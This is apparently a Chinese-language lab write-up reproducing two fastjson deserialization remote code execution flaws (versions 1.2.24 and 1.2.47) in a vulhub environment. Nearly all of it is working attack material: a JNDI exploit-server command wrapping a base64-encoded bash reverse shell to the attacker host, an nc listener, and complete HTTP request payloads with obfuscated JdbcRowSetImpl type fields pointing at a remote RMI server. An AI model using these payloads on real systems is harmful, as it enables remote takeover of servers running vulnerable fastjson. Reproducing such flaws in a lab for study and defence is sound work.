fastjson

fastjson漏洞复现

fastjson 1.2.24 反序列化导致任意命令执行漏洞

使用vulhub为漏洞环境

攻击机：192.168.20.128

靶机：192.168.20.140

xray检测出漏洞

漏洞复现

这里使用JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar工具搭建rmi服务

java -jar JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar -C "/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC81NTU1IDA+JjE=}|{base64,-d}|{/bin/bash,-i}"

监听5555端口，发送payload

POST / HTTP/1.1
Host: 192.168.20.140:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 281
Content-Type: application/json
Accept-Encoding: gzip

{
  "883n6v": {
    "@ty\u0070\x65": "L\u0063\x6Fm.\u0073\x75\u006E\u002E\u0072\u006F\u0077\x73e\u0074\u002EJ\x64\u0062c\u0052o\u0077\u0053\x65tImp\x6C;",
    "dataSourceName": "rmi://192.168.20.128:1099/remoteExploit8",
    "autoCommit": true
  }
}

成功弹shell

Fastjson 1.2.47 远程命令执行漏洞

使用vulhub为漏洞环境

攻击机：192.168.20.128

靶机：192.168.20.140

xray检测出漏洞

漏洞复现

这里使用JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar工具搭建rmi服务

java -jar JNDI-Injection-Exploit-Plus-2.2-SNAPSHOT-all.jar -C "/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC81NTU1IDA+JjE=}|{base64,-d}|{/bin/bash,-i}"

监听5555端口

nc -lvvp 5555

发送payload

POST / HTTP/1.1
Host: 192.168.20.140:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 434
Content-Type: application/json
Accept-Encoding: gzip

{
  "f345ry":{"\x40typ\u0065":"java.lang.Class","val":"\u0063om.s\u0075\x6E\u002E\u0072ows\x65t.J\x64b\x63\u0052ow\u0053\u0065t\u0049mpl"},
  "twr68p":{{
      "\x40typ\u0065": "com.alibaba.fastjson.JSONObject",
      "8itdzo":
      {"\x40typ\u0065":"\u0063om.s\u0075\x6E\u002E\u0072ows\x65t.J\x64b\x63\u0052ow\u0053\u0065t\u0049mpl","dataSourceName":"rmi://192.168.20.128:1099/remoteExploit8","autoCommit":true}
  }:{}}
}

反连成功